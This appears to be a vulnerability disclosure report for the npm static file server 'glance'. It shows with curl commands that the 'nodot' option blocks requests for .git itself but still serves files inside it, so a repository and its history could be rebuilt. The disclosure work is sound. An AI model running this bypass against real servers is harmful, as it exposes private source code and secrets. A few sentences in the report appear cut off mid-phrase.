I would like to report a sensitive information disclosure in
Similar to #486933 in some ways.
module name: glance
a quick disposable http server for static files
weekly downloads 41
The glance module allows directory browsing and serves static files through the browser.
The config option nodot can be used to prevent serving sensitive folders such as
This rule can be bypassed using the technique below, which can lead to sensitive information disclosure (an interesting example: https://smitka.me/).
$ npm install -g glance
Inside a project directory, initialise
$ git init
Add a rule to ignore dotfiles in
Start glance in the current directory.
$ glance --verbose
glance serving /project/directory on port 8080
Now, the current directory will be served by glance with the exception of the folder .git and the file .gitignore.
If we try to curl .git we get a Not Found error:
$ curl --path-as-is 127.0.0.1:8080/.git
<title>File Not Found</title>
However, if we try to fetch files or folders inside a forbidden [dot]folder there is no problem at all, and most of its content can be extracted successfully (except the dotfiles themselves).
$ curl --path-as-is 127.0.0.1:8080/.git/HEAD
>The structure of a git repository is well known, so it is possible to find references to the objects/packs in the repository, download them via direct requests and reconstruct the repository and obtain your files – not only the current ones, but also the past files.
This essentially bypasses the nodot feature and allows an attacker to read from a directory that the victim has not allowed access to.
References:
- https://github.com/jarofghosts/glance#command-line-options
- https://smitka.me/